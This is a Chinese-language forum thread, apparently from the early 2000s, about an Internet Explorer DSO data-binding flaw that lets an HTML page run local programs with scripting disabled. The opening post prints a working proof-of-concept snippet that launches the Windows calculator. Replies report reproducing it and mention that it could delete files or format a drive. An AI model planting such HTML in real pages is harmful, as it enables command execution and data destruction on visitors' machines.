何须脚本 网页就能执行任何恶意命令!

小希格玛

一位以色列安全专家发现，只要使用一小段HTML代码，就可以让Windows系统自动执行任何本地命令。这一漏洞可在IE、Outlook和OutlooK Express上发生，即使在这些程序的安全设定中已经禁止掉了ActiveX和脚本的执行。究其根源，它是由一个早在IE4时代就存在的名为DSO的漏洞引起的。有兴趣的话，大家可以研究一下下面这段可以自动运行Windows计算器的代码。

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
   <security>
      <exploit>
         <![CDATA[
         <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
         ]]>
      </exploit>
   </security>
</xml>

厨师

估计是ie自带了xmlparse，哎

小希格玛

我都不敢上网了
现在只去大的网站，一般个人网站都不去

nethree

最初的帖子在 小希格玛
[B]我都不敢上网了
现在只去大的网站，一般个人网站都不去 [/B]

真的嘛？我想不会吧！

zjcq

测试了一下，真的太可怕了，M$怎么没有补丁呢？

小希格玛

出PACK可能要晚点

ztm2000

我用win2000＋ie6，将代码中的c:\windows 改为此c:\winnt 果然计算器执行了，实在是可怕。看来以后装机时不能把系统装在默认的目录下。

小希格玛

最初的帖子在 一天
[B]。 [/B]

都有该漏洞，主要是看你安装的目录了
以后安装目录可得要该了呀

zjcq

该安装目录也没用，可以获得系统环境变量，或干脆将C: format，我已测试将temp目录中的文件全部删除。

bluebird

不就把它加入html文件中吗。用浏览器没反应呀。